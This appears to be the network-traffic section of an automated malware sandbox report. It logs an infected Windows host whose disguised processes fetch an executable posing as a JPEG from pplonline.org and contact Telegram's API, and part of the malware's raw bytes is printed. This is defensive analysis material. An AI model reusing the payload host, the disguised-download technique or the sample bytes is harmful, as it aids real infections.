Jan 14, 2022 13:49:38.604599953 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.604665995 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.606769085 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.606794119 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.606981993 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.607000113 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.607173920 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.608597994 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.608624935 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.608793974 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.608813047 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.608896017 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.618767977 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.618803978 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.618956089 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.618977070 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.618993998 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.619265079 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.621834993 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.621890068 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.621967077 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.621985912 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.622016907 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.622055054 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.623301029 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.623334885 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.623408079 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.623421907 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.623465061 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.623485088 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.623739004 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.623837948 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.623841047 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.623856068 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.623924017 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.623951912 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.624768019 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.624800920 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.624862909 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.624881029 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.624897957 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.625773907 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.625802994 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.625880957 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.625895023 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.625921011 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.625953913 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.633903027 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.633943081 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634031057 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634057045 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634076118 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634198904 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634217024 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634254932 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634308100 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634320021 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634344101 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634392977 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634752035 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634792089 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634845018 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634860992 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.634912014 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.634924889 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.635663986 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.635703087 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.635765076 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.635798931 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.635816097 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.635860920 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.636394978 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.636437893 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.636501074 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.636518002 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.636533022 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.636574984 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.637554884 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.637595892 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.637660980 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.637676001 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.637691975 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.637738943 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.638353109 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.638470888 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.638479948 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.638655901 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.638950109 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:39.455002069 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.455039978 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.455209017 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.455730915 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.455754995 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.525211096 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.525409937 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.532447100 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.532480001 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.532814980 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.535468102 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.577887058 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.584853888 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.585727930 CET	443	49747	149.154.167.220	192.168.2.3
Jan 14, 2022 13:49:39.586046934 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:39.586225033 CET	49747	443	192.168.2.3	149.154.167.220
Jan 14, 2022 13:49:44.750529051 CET	49750	80	192.168.2.3	104.18.115.97
Jan 14, 2022 13:49:44.767529964 CET	80	49750	104.18.115.97	192.168.2.3
Jan 14, 2022 13:49:44.768305063 CET	49750	80	192.168.2.3	104.18.115.97
Jan 14, 2022 13:49:44.805115938 CET	49750	80	192.168.2.3	104.18.115.97
Jan 14, 2022 13:49:44.822029114 CET	80	49750	104.18.115.97	192.168.2.3
Jan 14, 2022 13:49:44.833376884 CET	80	49750	104.18.115.97	192.168.2.3
Jan 14, 2022 13:49:44.879106045 CET	49750	80	192.168.2.3	104.18.115.97
Jan 14, 2022 13:49:48.108803988 CET	49744	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:48.124140978 CET	49750	80	192.168.2.3	104.18.115.97
Jan 14, 2022 13:49:48.139602900 CET	80	49744	208.95.112.1	192.168.2.3
Jan 14, 2022 13:49:48.139739037 CET	49744	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:48.142030001 CET	80	49750	104.18.115.97	192.168.2.3
Jan 14, 2022 13:49:48.143897057 CET	49750	80	192.168.2.3	104.18.115.97
Jan 14, 2022 13:49:48.151113987 CET	49751	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:48.180876017 CET	80	49751	208.95.112.1	192.168.2.3
Jan 14, 2022 13:49:48.180990934 CET	49751	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:48.181268930 CET	49751	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:48.213846922 CET	80	49751	208.95.112.1	192.168.2.3
Jan 14, 2022 13:49:48.269980907 CET	49751	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:50:13.825573921 CET	49751	80	192.168.2.3	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 13:49:21.146028996 CET	57459	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:21.167404890 CET	53	57459	8.8.8.8	192.168.2.3
Jan 14, 2022 13:49:36.335261106 CET	57875	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:36.356714964 CET	53	57875	8.8.8.8	192.168.2.3
Jan 14, 2022 13:49:36.949631929 CET	54154	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:36.968750000 CET	53	54154	8.8.8.8	192.168.2.3
Jan 14, 2022 13:49:39.434436083 CET	52806	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:39.453140020 CET	53	52806	8.8.8.8	192.168.2.3
Jan 14, 2022 13:49:44.688765049 CET	64021	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:44.711551905 CET	53	64021	8.8.8.8	192.168.2.3
Jan 14, 2022 13:49:44.968084097 CET	60784	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:44.985660076 CET	53	60784	8.8.8.8	192.168.2.3
Jan 14, 2022 13:49:48.130347013 CET	51143	53	192.168.2.3	8.8.8.8
Jan 14, 2022 13:49:48.150048018 CET	53	51143	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 14, 2022 13:49:21.146028996 CET	192.168.2.3	8.8.8.8	0x62a7	Standard query (0)	pplonline.org	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.335261106 CET	192.168.2.3	8.8.8.8	0x6016	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.949631929 CET	192.168.2.3	8.8.8.8	0xb7de	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:39.434436083 CET	192.168.2.3	8.8.8.8	0x2de3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:44.688765049 CET	192.168.2.3	8.8.8.8	0xf186	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:44.968084097 CET	192.168.2.3	8.8.8.8	0x7b06	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jan 14, 2022 13:49:48.130347013 CET	192.168.2.3	8.8.8.8	0xb699	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 14, 2022 13:49:21.167404890 CET	8.8.8.8	192.168.2.3	0x62a7	No error (0)	pplonline.org		108.167.165.140	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.356714964 CET	8.8.8.8	192.168.2.3	0x6016	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.968750000 CET	8.8.8.8	192.168.2.3	0xb7de	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.968750000 CET	8.8.8.8	192.168.2.3	0xb7de	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.968750000 CET	8.8.8.8	192.168.2.3	0xb7de	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:36.968750000 CET	8.8.8.8	192.168.2.3	0xb7de	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:39.453140020 CET	8.8.8.8	192.168.2.3	0x2de3	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:44.711551905 CET	8.8.8.8	192.168.2.3	0xf186	No error (0)	icanhazip.com		104.18.115.97	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:44.711551905 CET	8.8.8.8	192.168.2.3	0xf186	No error (0)	icanhazip.com		104.18.114.97	A (IP address)	IN (0x0001)
Jan 14, 2022 13:49:44.985660076 CET	8.8.8.8	192.168.2.3	0x7b06	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Jan 14, 2022 13:49:48.150048018 CET	8.8.8.8	192.168.2.3	0xb699	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

raw.githubusercontent.com

api.telegram.org

pplonline.org

ip-api.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49745	185.199.108.133	443	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49746	185.199.108.133	443	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49747	149.154.167.220	443	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49743	108.167.165.140	80	C:\Users\user\AppData\Local\Temp\svchoste.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 13:49:21.338746071 CET	1129	OUT	POST /Cgi//6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 14, 2022 13:49:21.506848097 CET	1130	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:21 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 06 Jun 2019 09:01:52 GMT Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=75 Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 12 e8 37 14 00 00 85 c0 74 04 33 c0 5d c3 a1 5c 22 02 10 5d ff a0 b0 01 00 00 55 8b ec a1 5c 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@BU\"u7t3]\"]U\"
Jan 14, 2022 13:49:21.506890059 CET	1131	IN	Data Raw: 02 10 85 c0 75 13 e8 12 14 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff a0 bc 01 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 0e e8 ec 13 00 00 85 c0 75 0c a1 5c 22 02 10 5d ff a0 b4 01 00 00 5d c3 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 c9 13 Data Ascii: ut]\"]U\"uu\"]]U\"ut]\"]U\"ut3]\"]`xU\"ut]\"]U\"u[u\"]`\|]U\"u;t]\"]
Jan 14, 2022 13:49:21.506916046 CET	1133	IN	Data Raw: 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff a0 d0 01 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 12 e8 bb 0e 00 00 85 c0 74 04 33 c0 5d c3 a1 5c 22 02 10 5d ff a0 28 02 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 0e e8 96 0e 00 00 85 c0 75 0c a1 Data Ascii: t]\"]U\"ut3]\"](U\"uu\"]4]U\"ust]\"]U\"uMt3]\"],U\"u(u\"]D]U\"ut]\"]@
Jan 14, 2022 13:49:21.506937981 CET	1134	IN	Data Raw: 10 5d ff 60 3c 5d c3 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 91 09 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff 60 40 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 6e 09 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff a0 0c 01 00 00 a1 5c Data Ascii: ]`<]U\"ut]\"]`@U\"unt]\"]\"uKt\"\"u*u\"U\"ut]\"]U\"ut]\"]4U\"ut
Jan 14, 2022 13:49:21.506961107 CET	1136	IN	Data Raw: 00 00 85 c0 74 04 33 c0 5d c3 a1 5c 22 02 10 5d ff a0 e0 02 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 48 04 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff a0 d4 02 00 00 a1 5c 22 02 10 85 c0 75 11 e8 25 04 00 00 85 c0 74 03 33 c0 c3 a1 Data Ascii: t3]\"]U\"uHt]\"]\"u%t3\"U\"uu\"]]U\"uu\"]4]U\"uu\"]0]U\"uu\"]<]U\"u
Jan 14, 2022 13:49:21.506983995 CET	1137	IN	Data Raw: 8b f0 59 59 85 f6 74 17 53 56 e8 39 ff ff ff 56 8b f8 ff 15 48 d2 01 10 83 c4 0c 85 ff 75 1f 83 65 f4 00 8d 75 f4 6a 0a 83 ec 0c 89 5d f8 8b fc a5 a5 a5 ff 15 64 d2 01 10 83 c4 10 8b f8 8b c7 5f 5e 5b 8b e5 5d c3 55 8b ec 81 ec 24 01 00 00 a1 38 Data Ascii: YYtSV9VHueuj]d_^[]U$8"3EVuEWu}Vhtj PEPuVuWuuhhP43PjA}jXDPMH3_^]U$8"3EVuEWu}Vh
Jan 14, 2022 13:49:21.507005930 CET	1138	IN	Data Raw: 18 00 6a 03 58 0f 44 c1 50 e8 12 9a 01 00 8b 4d fc 83 c4 2c 33 cd e8 f8 8c 01 00 8b e5 5d c3 55 8b ec 81 ec 04 01 00 00 a1 38 22 02 10 33 c5 89 45 fc ff 75 14 8b 45 10 50 ff 75 0c 8d 85 fc fe ff ff ff 75 08 68 28 d4 01 10 68 00 01 00 00 50 ff 15 Data Ascii: jXDPM,3]U8"3EuEPuuh(hP43PjA}jXDPM(3]U8"3EuEuPuuhhP43PA}QjXDPHM,3.]Ud
Jan 14, 2022 13:49:21.507029057 CET	1140	IN	Data Raw: 0a 80 38 00 75 05 6a 13 58 5d c3 56 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 b6 c3 00 00 83 c4 20 8b f0 83 3d 78 22 02 10 00 74 21 56 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 5a Data Ascii: 8ujX]Vu$u uuuuuu =x"t!Vu$u uuuuuuZ$^]Uuehuu[t8ujX]Vuuuuuuz=x"tVuuuuuu^]U=p"tj0X]uuup"
Jan 14, 2022 13:49:21.507051945 CET	1141	IN	Data Raw: ec 81 ec a4 00 00 00 a1 38 22 02 10 33 c5 89 45 fc 83 3d 70 22 02 10 00 56 8b 75 0c 74 05 6a 30 58 eb 5a 57 56 ff 75 08 e8 6b 37 00 00 8b f8 59 59 85 ff 75 45 39 05 7c 22 02 10 74 3d 39 46 04 74 06 83 7e 04 02 75 32 8d 85 5c ff ff ff 50 ff 75 08 Data Ascii: 8"3E=p"Vutj0XZWVuk7YYuE9\|"t=9Ft~u2\PuRYP-YYuEu3A~jXDF_M3^]U=p"tj0X]]^U=p"tj0X]]U8"3E=p"Etj0XXVuPuu6
Jan 14, 2022 13:49:21.507076025 CET	1142	IN	Data Raw: 3c 00 00 55 8b ec e8 ca 02 00 00 85 c0 75 37 56 ff 75 10 ff 75 0c ff 75 08 e8 f7 98 00 00 83 c4 0c 8b f0 83 3d 78 22 02 10 00 74 17 56 ff 75 10 ff 75 0c ff 75 08 68 14 da 01 10 e8 2a ec ff ff 83 c4 14 8b c6 5e 5d c3 55 8b ec e8 85 02 00 00 85 c0 Data Ascii: <Uu7Vuuu=x"tVuuuh*^]Uu]x]Uqu]]U]u]]UIu7Vuuun=x"tVuuuh^]Uu]k]Uu]n]U
Jan 14, 2022 13:49:21.652792931 CET	1144	IN	Data Raw: 00 c7 45 cc 70 43 53 ce c7 45 d4 71 43 53 ce c7 45 dc 6c 43 53 ce c7 45 e4 6d 43 53 ce c7 45 ec 6e 43 53 ce c7 45 f4 6f 43 53 ce 89 45 f8 e8 1e 76 01 00 8b f8 8d 45 ac 6a 0a 50 56 57 e8 c0 02 01 00 8b f0 83 c4 14 85 f6 0f 85 f1 00 00 00 6a 71 50 Data Ascii: EpCSEqCSElCSEmCSEnCSEoCSEvEjPVWjqPPP\|xPPPDP8PlP`PW(PYYu,uuPu\PWuxM!ujqEAEEPEP PP
Jan 14, 2022 13:49:22.204152107 CET	1280	OUT	POST /Cgi//1.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
